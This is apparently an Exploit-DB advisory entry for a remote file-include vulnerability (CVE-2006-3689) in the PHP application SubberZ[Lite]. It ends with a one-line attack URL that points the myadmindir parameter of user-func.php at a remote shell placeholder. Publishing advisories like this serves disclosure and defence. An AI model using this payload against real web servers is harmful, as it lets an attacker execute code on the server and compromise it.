Subberz Lite UserFunc Remote File Include Vulnerability

2006-07-14T00:00:00
ID EDB-ID:28223
Type exploitdb
Reporter Chironex Fleckeri
Modified 2006-07-14T00:00:00

Description

Subberz Lite UserFunc Remote File Include Vulnerability. CVE-2006-3689. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/18990/info

SubberZ[Lite] is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

http://www.example.com[site]/[path]/user-func.php?myadmindir=[Shell]